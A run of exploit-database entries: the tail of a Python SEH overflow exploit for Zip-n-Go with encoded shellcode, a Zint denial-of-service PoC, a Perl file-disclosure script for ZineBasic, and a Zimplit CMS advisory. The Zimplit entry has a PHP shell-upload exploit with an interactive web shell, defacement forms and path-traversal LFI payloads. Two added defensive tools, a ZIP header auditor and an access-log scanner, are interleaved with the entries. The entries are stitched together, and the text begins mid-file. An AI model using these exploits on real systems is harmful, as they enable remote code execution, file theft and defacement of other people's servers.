EOCDRHeader     += '\x01\x00'         # number of central directory records on this disk 
EOCDRHeader     += '\x01\x00'         # total number of central directory records 
EOCDRHeader     += '\x12\x10\x00\x00' # size of central directory 0x1012 = 4114 bytes
EOCDRHeader     += '\x02\x10\x00\x00' # offset of start of central directory, relative to start of archive 
EOCDRHeader     += '\x00\x00'         # comment length 
#EOCDRHeader     += '\x00'             # comment 
 
Witchcraft  = '\x54'                      # PUSH ESP          * save stack pointer
Witchcraft += '\x5F'                      # POP EDI
Witchcraft += '\x54'                      # PUSH ESP          * calculate offset for decoder  
Witchcraft += '\x58'                      # POP EAX
Witchcraft += '\x05\x11\x21\x11\x11'      # ADD EAX,11112111
Witchcraft += '\x05\x11\x21\x11\x11'      # ADD EAX,11112111
Witchcraft += '\x2D\x53\x25\x22\x22'      # SUB EAX,22222553
Witchcraft += '\x50'                      # PUSH EAX
Witchcraft += '\x5C'                      # POP ESP

#https://github.com/ihack4falafel/Slink
#root@kali:/opt/Slink# python Slink.py                        * decode the following 'nop;mov esp, edi;mov eax, edi;add eax, 58c;jmp eax'
#Enter your shellcode: 9089FC89F8058C050000FFE0
#[+] Shellcode size is divisible by 4
#[+] Encoding [e0ff0000]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
Witchcraft += "\x05\x11\x11\x77\x61" ## add  eax, 0x61771111
Witchcraft += "\x05\x11\x11\x66\x51" ## add  eax, 0x51661111
Witchcraft += "\x05\x11\x11\x55\x61" ## add  eax, 0x61551111
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
Witchcraft += "\x50"                 ## push eax
#[+] Encoding [058c05f8]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
Witchcraft += "\x05\x74\x13\x46\x13" ## add  eax, 0x13461374
Witchcraft += "\x05\x64\x13\x45\x13" ## add  eax, 0x13451364
Witchcraft += "\x05\x53\x12\x34\x12" ## add  eax, 0x12341253
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
Witchcraft += "\x50"                 ## push eax
#[+] Encoding [89fc8990]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
Witchcraft += "\x05\x41\x44\x76\x44" ## add  eax, 0x44764441
Witchcraft += "\x05\x41\x44\x65\x44" ## add  eax, 0x44654441
Witchcraft += "\x05\x41\x34\x54\x34" ## add  eax, 0x34543441
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
Witchcraft += "\x50"                 ## push eax

Evil  = '\x41' * 3066                     # offset to shellcode 
Evil += shellcode                         # bind shell  
Evil += '\x43' * (716-len(shellcode))     # shellcode host
Evil += Witchcraft                        # magic! 
Evil += '\x42' * (126-len(Witchcraft))    # witchcraft host
Evil += '\x74\x80\x75\x80'                # nSEH - je -0x80 / jne -0x80: one of the pair always takes the short jump backward
Evil += '\x6e\x4c\x40\x00'                # SEH  - pop ecx, pop ebp, retn in zip-n-go.exe 
Evil += '\x41' * (4064-3908-4-4)
Evil += '.txt'

buffer  = LocalFileHeader
buffer += Evil
buffer += CDFileHeader
buffer += Evil
buffer += EOCDRHeader  

try:
	f=open("Evil.zip","wb")                # binary mode so no newline translation touches the headers
	print "[+] Creating %s bytes evil payload.." %len(Evil)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except Exception as e:
	print e
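The PoC's header comments explain the ZIP layout it abuses: a 30-byte local file header whose "file name length" field is set to 4068, with one CRC byte dropped so that Zip-n-Go reads the length from offset 25. A spec-conformant parser sees something different: name length 15, and an uncompressed size of 0xe4000000 where the shifted bytes land. The parser below is an added example (mine, not the PoC author's) that reads the central directory and each local header with the standard layouts and reports the inconsistencies that such a crafted archive produces. The sample is rebuilt from the PoC's header bytes; the 260-byte name threshold is my choice.

```python
import io
import struct
import zipfile
from typing import Dict, List

LOCAL_SIG, CD_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
LOCAL_FMT = "<4sHHHHHIIIHH"          # 30-byte local file header
CD_FMT = "<4sHHHHHHIIIHHHHHII"       # 46-byte central directory header
EOCD_FMT = "<4sHHHHIIH"              # 22-byte end of central directory record
LOCAL_LEN, CD_LEN = struct.calcsize(LOCAL_FMT), struct.calcsize(CD_FMT)
MAX_NAME = 260                        # assumption: names longer than Windows MAX_PATH deserve a look


def parse_local(data: bytes, off: int) -> Dict[str, int]:
    f = struct.unpack_from(LOCAL_FMT, data, off)
    return {"offset": off, "method": f[3], "crc": f[6], "csize": f[7], "usize": f[8],
            "nlen": f[9], "xlen": f[10], "clen": 0}


def parse_central(data: bytes) -> List[Dict[str, int]]:
    """Walk the central directory starting from the EOCD record at the end of the file."""
    idx = data.rfind(EOCD_SIG)
    if idx < 0 or idx + struct.calcsize(EOCD_FMT) > len(data):
        return []
    _, _, _, _, entries, _, cd_off, _ = struct.unpack_from(EOCD_FMT, data, idx)
    out: List[Dict[str, int]] = []
    off = cd_off
    for _ in range(entries):
        if off + CD_LEN > len(data) or data[off:off + 4] != CD_SIG:
            break
        f = struct.unpack_from(CD_FMT, data, off)
        out.append({"offset": off, "method": f[4], "crc": f[7], "csize": f[8], "usize": f[9],
                    "nlen": f[10], "xlen": f[11], "clen": f[12], "local_offset": f[16]})
        off += CD_LEN + f[10] + f[11] + f[12]
    return out


def audit_zip(data: bytes, max_name: int = MAX_NAME) -> List[str]:
    """Return findings; an empty list means local and central headers agree and are sane."""
    findings: List[str] = []
    for cd in parse_central(data):
        lo = cd["local_offset"]
        if lo + LOCAL_LEN > len(data) or data[lo:lo + 4] != LOCAL_SIG:
            findings.append(f"central entry @{cd['offset']}: bad local header offset {lo}")
            continue
        local = parse_local(data, lo)
        if cd["nlen"] != local["nlen"]:
            findings.append(f"entry @{lo}: name length {local['nlen']} (local) != {cd['nlen']} (central)")
        for label, rec, hdr_len in (("local", local, LOCAL_LEN), ("central", cd, CD_LEN)):
            if rec["nlen"] > max_name:
                findings.append(f"{label} header @{rec['offset']}: name length {rec['nlen']} > {max_name}")
            if rec["method"] == 0 and rec["csize"] != rec["usize"]:
                findings.append(f"{label} header @{rec['offset']}: stored entry but sizes differ "
                                f"({rec['csize']} vs {rec['usize']})")
            end = rec["offset"] + hdr_len + rec["nlen"] + rec["xlen"] + rec["clen"]
            end += rec["csize"] if label == "local" else 0
            if end > len(data):
                findings.append(f"{label} header @{rec['offset']}: declared fields run past end of archive")
        name = data[lo + LOCAL_LEN: lo + LOCAL_LEN + local["nlen"]]
        if b".." in name or any(b < 0x20 for b in name):
            findings.append(f"entry @{lo}: suspicious characters in file name")
    return findings


def build_advisory_sample() -> bytes:
    """Constructed here from the PoC's header bytes: 3-byte CRC, name length field 0x0fe4, 4068-byte name."""
    local = (b"PK\x03\x04" + b"\x14\x00" + b"\x00\x00" + b"\x00\x00" + b"\xb7\xac" + b"\xce\x34"
             + b"\x00\x00\x00"                        # only three CRC bytes: every later field shifts
             + b"\x00\x00\x00\x00" + b"\x00\x00\x00\x00" + b"\xe4\x0f" + b"\x00\x00" + b"\x00")
    name = b"A" * 4068
    central = (b"PK\x01\x02" + b"\x14\x00" + b"\x14\x00" + b"\x00\x00" + b"\x00\x00" + b"\xb7\xac"
               + b"\xce\x34" + b"\x00" * 12 + b"\xe4\x0f" + b"\x00\x00" * 3 + b"\x01\x00"
               + b"\x24\x00\x00\x00" + b"\x00\x00\x00\x00")
    eocd = (b"PK\x05\x06" + b"\x00\x00" + b"\x00\x00" + b"\x01\x00" + b"\x01\x00"
            + struct.pack("<II", CD_LEN + 4068, LOCAL_LEN + 4068) + b"\x00\x00")
    return local + name + central + name + eocd


def build_wellformed_sample() -> bytes:
    """A normal one-entry archive written by the standard library, for comparison."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("hello.txt", b"hello")
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_advisory_sample()
    for line in audit_zip(blob) or ["no findings"]:
        print(line)
```

On the PoC's archive the audit reports three things: the central name length (4068) disagrees with the local one (15), the central name length exceeds the threshold, and the local header claims a stored entry with compressed size 0 but uncompressed size 0xe4000000. A well-formed archive yields no findings, which is the property a mail gateway or upload filter would check before handing a file to a tool like Zip-n-Go.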
            
# Exploit Title: Zint Barcode Generator 2.6 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.zint.org.uk
# Software Link: https://sourceforge.net/projects/zint/files/latest/download
# Version: 2.6
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# Add 2D Component / 2D Component Data

#!/usr/bin/python
    
buffer = "A" * 44450
 
payload = buffer
try:
    f=open("exp.txt","w")
    print "[+] Creating %s bytes evil payload." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created."
            
# Title: ZineBasic 1.1 Remote File Disclosure Exploit
# Author: bd0rk || East Germany former GDR
# Tested on: Ubuntu-Linux
# Vendor: http://w2scripts.com/news-publishing/
# Download: http://downloads.sourceforge.net/project/zinebasic/zinebasic/v1.1/zinebasic_v1.1_00182.zip?r=https%3A%2F%2Fsourceforge.net%2Fprojects%2Fzinebasic%2F&ts=1474313108&use_mirror=master
# Twitter: twitter.com/bd0rk

#Greetings: zone-h.org, Curesec GmbH, SiteL GmbH, i:TECS GmbH, rgod, GoLd_M
----------------------------------------------------------------------------------
=> Vulnerable sourcecode in /zinebasic_v1.1_00182/articleImg/delImage.php line 12

=> Vulnerable snippet: $id = $_GET['id'];

----------------------------------------------------------------------------------

Exploit code with a small deliberate error at line 25 ('gainst script-kiddies!) || Copy&Paste:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl
use LWP::Simple;
use LWP::UserAgent;
sub ex()
{
print "Usage: perl $0 someone.com /ZineBasic_Dir/\n";
print "\nZineBasic 1.1 Remote File Disclosure Exploit\n";
print "\ Contact: twitter.com/bd0rk\n";
($host, $path, $under, $file,) = @ARGV;
$under="/articleImg/";
$file="delImage.php?id=[REMOTE_FILE]";
my $target = "http://".$host.$path.$under.$file;
my $usrAgent = LWP::UserAgent->new();
my $request = $usrAgent->get($target,":content_file"=>"[REMOTE_FILE]");
if ($request->is_success)
{
print "$target <= JACKPOT!\n\n";
print "etc/passwd\n";
exit();
}
else
{
print "Exploit $target FAILED!\n[!].$request->status_line.\n";
exit();
}
            
source: https://www.securityfocus.com/bid/53990/info

Zimplit CMS is prone to multiple local file-include vulnerabilities and an arbitrary file-upload vulnerability.

An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.

Zimplit CMS 3.0 is vulnerable; other versions may also be affected. 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : Zimplit CMS v3.0 <= (FU/XSRF/LFI) Multiple Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com | www.inj3ct0rs.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com * www.dis9.com
# platform : php
# Type : Multiple Vulnerabilities
# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10 (En)
# Download : [http://www.zimplit.com/order.html]
###

# <3 <3 Greetings t0 Palestine <3 <3

# Exploit's / p0c's ====>

##### Exp(1) Arbitrary File/Shell Upload =>

<!-- p0c (1) -->
<?php

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
 $sock = fsockopen($host, 80);
 while (!$sock)
 {
  print "\n[-] No response from {$host}:80 Trying again...";
  $sock = fsockopen($host, 80);
 }
 fputs($sock, $packet);
 $resp = "";
 while (!feof($sock)) $resp .= fread($sock, 1024);
 fclose($sock);
 return $resp;
}
print "\n|==================================================|";
print "\n|   Zimplit CMS v3.0 <= Arbitrary Shell Upload     |";
print "\n|  Provided By KedAns-Dz <ked-h[at]hotmail[.]com>  |";
print "\n|==================================================|\n";
if ($argc < 3)
{
 print "\nUsage  : php $argv[0] [host] [path]";
 print "\nExample : php $argv[0] www.p0c.tld /zimplit/\n";
 die();
}
$host = $argv[1];
$path = $argv[2];
$data  = "--31337\r\n";
$data .= "Content-Disposition: form-data; name=\"File\"; filename=\"k3d.php\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--31337--\r\n";
$packet  = "POST {$path}/zimplit.php?action=upload&folder=editor/files HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=31337\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
if (!defined('STDIN')) define('STDIN', fopen("php://stdin", "r")); // the PHP CLI already defines STDIN
while(1)
{
 print "\n Inj3ct0rK3d-Sh3lL#";
 $cmd = trim(fgets(STDIN)); # f.ex : C:\\k3d.php
 if ($cmd != "exit")
 {
  $packet = "GET {$path}k3d.php{$html[3]} HTTP/1.0\r\n";
  $packet.= "Host: {$host}\r\n";
  $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; # command is sent base64-encoded in the Cmd header
  $packet.= "Connection: close\r\n\r\n";
  $output = http_send($host, $packet);
  // eregi() was removed in PHP 7; case-insensitive substring checks give the same result
  if (stripos($output, "print") !== false || stripos($output, "_code_") === false) die("\n[-] Exploit failed...\n");
  $shell = explode("_code_", $output);
  print "\n{$shell[1]}";
 }
 else break;
}
?>

<!-- p0c (2) -->
<form action="http://[Target]/zimplit.php?action=upload&folder=editor/files" method="post">
<input type="file" name="file" size="50"/>
<input type="hidden" name="file" />
<input type="submit" value="Upload Sh3ll/File !" />
</form>

[+] Access Shell http://[Target]/editor/files/k3d.php
[+] Access Shell http://[Target]/editor/files/{ U R Shell }.*

##### Exp(2) Edit HTML (index.html) File =>

<form action='http://[target]/zimplit.php?action=save&file=index.html' method='post'>
<textarea id="html" name="html">
<center>
<h1> HaCked By KedAns-Dz </h1>
</center>
</textarea>
<input type='submit' value='Edit HTML Page'>
</form>

##### Exp(3) Add new HTML File/Page =>

<form action='http://[target]/zimplit.php?action=new&file=dz0.html' method='post'>
<textarea id="html" name="html">
<center>
<h1> HaCked By KedAns-Dz </h1>
</center>
</textarea>
<input type='submit' value='Create new HTML Page'>
</form>

##### Exp(4) Local File Include =>

<!-- p0c (1) -->
<form action='http://[target]/zimplit.php?action=load&file=../../../../../../../[ LFI ]%00' method='post'>
<input type='submit' value='Include Local File'>
</form>

<!-- p0c (2) -->

<?php
$lfi =
curl_init("http://[Target]/editor/zimplit_js.php");
curl_setopt($lfi, CURLOPT_POST, true);
curl_setopt($lfi, CURLOPT_POSTFIELDS,
  array('lang'=>"../../../../../../../../[ LFI ]%00"));
curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($lfi);
curl_close($lfi);
print "$postResult";
?>

<!-- p0c (3) -->

<?php
$lfi =
curl_init("http://[Target]/editor/user.php");
curl_setopt($lfi, CURLOPT_POST, true);
curl_setopt($lfi, CURLOPT_POSTFIELDS,
  array('lang'=>"../../../../../../../../[ LFI ]%00"));
curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($lfi);
curl_close($lfi);
print "$postResult";
?>
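As an added defender-side example (not part of the advisory or of Zimplit), the Python scanner below walks web-server access-log lines and flags the request shapes the four PoCs above produce: unauthenticated zimplit.php actions, traversal or NUL bytes in the file= parameter, PHP scripts fetched from editor/files, and POSTs to the two editor scripts used for LFI. The log lines, client IPs and the traversal target name are constructed placeholders.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample lines in Apache combined log format (not from the advisory).
# "placeholder.txt" stands in for whatever file a traversal would name.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2011:10:01:02 +0000] "POST /zimplit/zimplit.php?action=upload&folder=editor/files HTTP/1.0" 200 312 "-" "php-client"
10.0.0.5 - - [12/May/2011:10:01:03 +0000] "GET /zimplit/editor/files/k3d.php HTTP/1.0" 200 88 "-" "php-client"
10.0.0.7 - - [12/May/2011:10:02:10 +0000] "POST /zimplit/zimplit.php?action=load&file=../../../../../../../placeholder.txt%00 HTTP/1.1" 200 1754 "-" "curl/7.21"
10.0.0.9 - - [12/May/2011:10:03:00 +0000] "GET /zimplit/index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2011:10:03:05 +0000] "POST /zimplit/editor/user.php HTTP/1.1" 200 52 "-" "curl/7.21"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# zimplit.php actions the four PoCs reach without authentication
WATCHED_ACTIONS = {"upload", "save", "new", "load"}
# server-side executable extensions that should never be served from the upload folder
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# editor scripts whose POSTed lang parameter is used for LFI in p0c (2) and (3)
EDITOR_SCRIPTS = ("/editor/zimplit_js.php", "/editor/user.php")

def classify(line: str):
    """Return a finding dict for one log line, or None if nothing is suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m["target"])
    path = url.path.lower()
    # parse_qs percent-decodes, so %00 in the query becomes a real NUL byte here
    q = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    reasons = []
    if path.endswith("/zimplit.php"):
        action = q.get("action", "")
        if action in WATCHED_ACTIONS:
            reasons.append(f"zimplit.php action={action}")
        if "../" in q.get("file", "") or "\x00" in q.get("file", ""):
            reasons.append("traversal or NUL byte in file=")
    if "/editor/files/" in path and EXEC_EXT.search(path):
        reasons.append("executable script fetched from editor/files")
    if m["method"] == "POST" and path.endswith(EDITOR_SCRIPTS):
        reasons.append("POST to editor lang-loading script (body not logged)")
    return {"ip": m["ip"], "status": int(m["status"]), "reasons": reasons} if reasons else None

def scan(log_text: str):
    """Classify every line and return only the suspicious ones, in log order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]
```

The save and new actions are also used by legitimate editing, so in production correlate hits with expected administrator addresses before alerting.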

#### << ThE|End

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke
# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Barbaros-DZ
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
#============================================================================================================